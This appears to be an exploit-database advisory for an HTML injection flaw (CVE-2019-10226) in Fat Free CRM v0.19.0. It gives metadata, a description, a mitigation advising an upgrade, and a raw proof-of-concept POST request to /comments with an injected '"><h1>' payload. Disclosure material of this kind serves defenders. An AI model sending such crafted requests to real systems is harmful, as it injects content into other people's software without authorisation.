Fat Free CRM v0.19.0 - HTML Injection

vendor:

Fat Free CRM

by:

Ismail Tasdelen

5.4

CVSS

MEDIUM

HTML Injection

CWE

Product Name: Fat Free CRM

Affected Version From: v0.19.0

Affected Version To: v0.19.0

Patch Exists: YES

Related CWE: CVE-2019-10226

CPE: fat-free-crm

Metasploit:

Other Scripts:

Platforms Tested:

2019

Fat Free CRM v0.19.0 – HTML Injection

This exploit allows an attacker to inject arbitrary HTML code into the Fat Free CRM software. This vulnerability can be exploited by sending a specially crafted POST request to the /comments endpoint. The vulnerability exists in version 0.19.0 of the software.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software. The vendor has released a fix for this issue in later versions of Fat Free CRM.

Source

Exploit-DB raw data:

# Exploit Title: Fat Free CRM v0.19.0 - HTML Injection
# Date: 2019-03-20
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: http://www.fatfreecrm.com/
# Source Code : https://github.com/fatfreecrm
# Software :  Fat Free CRM
# Product Version:  v0.19.0
# Vulnerability Type : Code Injection
# Vulnerability : HTML Injection
# CVE : CVE-2019-10226

POST /comments HTTP/1.1
Host: XXXXXXXXXXXX
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept: */*;q=0.5, text/javascript, application/javascript, application/ecmascript, application/x-ecmascript
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: XXXXXXXXXXXX
X-CSRF-Token: xikVMkG4Le6llfW44C7CQZsD3Qz7bDgbMCbPFCtMjbzJFTfTF5SOx6xPhFDB6EL8MFNSNspHI51gZqz4V7QNMQ==
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 162
DNT: 1
Connection: close
Cookie: _fat_free_crm_session=b25NTU15QnR0ZGQvOFZiNXptdE81VXNDQUZ1TjYxUi9ucHhPSmxDb2lHS2gzZGhGY0V3Um5pT2NOWVZVZmd0T0pnUjI2UjNGeTJyOEt6ajBpMGRxcHJtT2ZyRnJkL0N3R1VrQlJCMXU1TGg5TkZEaHVubW5nM3duZzROQ0xrekRHWjBNWGpaQjF2TVgyaDR6QXUwS1lGdVEyQk5xN2dqVVVkYlhaV0JTY05DcncrdHNSZWp6dWRWSkQ2V2ZKb1NQRFAwMVhXZFZkQjBFOTJOSUZoQWc5S3J0SnIvS1hNNWVtTGtnd1EwRWJRVS9aWkpUZVhHWUJXQm5EYURLNG1jSEUrRVM5WFZFd05RSjR3ZEViQnViamZvY0RNRXMzZzJyUTZCL2E3YjhEVFVBRmFQOXhyaDd3Vnh5alRSTGlnYjlKUTVPT2laYzNRRjJIWWRLdGthQklrWFZDdFdrbElsWWlRcTBoQm1OZnRpVGRoVmp1ckhIZkxlVUt1c3M0MWQ2d3k1Uk4rd2dnVFAveDlrcHJza2tCd3BQUEduTENMeUxxOUpQN0tKL2RoU29FNHN6YWlrWndDNHcvRHlSUjd5TUFJVVErUm5tVnhLVVhtRE81cnltcnMvaHFuOXdPclR1NGl1OHVnbFZmdi9iaTJTWndjQzdKTThOc0dtMVp1a3VlQk5IQm04QmZuMVl3OHlOSHdJemllcU50UHZCSElGNTVOK0lCY2VSUHBIT20zcFNsay9PN0c1dWVkTHEzVnQxMUUvaXJRNHNoV2ZXNDNWeHpIbDdaUEJvaTBmaG1Xek0zRk5OZDdwTUZjUk4xaUl2N0hCMysvTFNHN2FNOTRhVGY5QU9Jc2VialV5Z1ovQS9ZUW5LUXRzL2lZQjNyTGVlTWY1QnFuczk1L3cvL25tNXlsTDlOcm5XdEpUYlNZNUhSSDNLZEJDRFZNUWVjcHQ1SjJCT3ArOW9nZDMwTGp1UWhqTm1lUE8wcGNHVVhDaG9adnNJdVZmUTVabDNUQ0JGSXEwdjNxK2xsdjF4Uk1TekVVZmoxM3JLajI5dis2VTlGRW4xVHZBNGY4Z3ZVemRZL1VZTy9ET01Ja3lzUkg1MzNQNUtWNUp2bi92QWVMTU1weUJ4NHV6Q0VjTmpvUlo1bVk4dzUzWDAxRWV5cVpBUkRBU1dveDFkQkdQMTJHMTAtLVl6endaUmJ2SStHeHZmZVUya1JKd0E9PQ%3D%3D--5584247e850cfdc0a8c912a9cc5ffaa1ce34b969

utf8=%E2%9C%93&comment%5Bcommentable_id%5D=143&comment%5Bcommentable_type%5D=Contact&comment%5Bcomment%5D=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&commit=Add+Note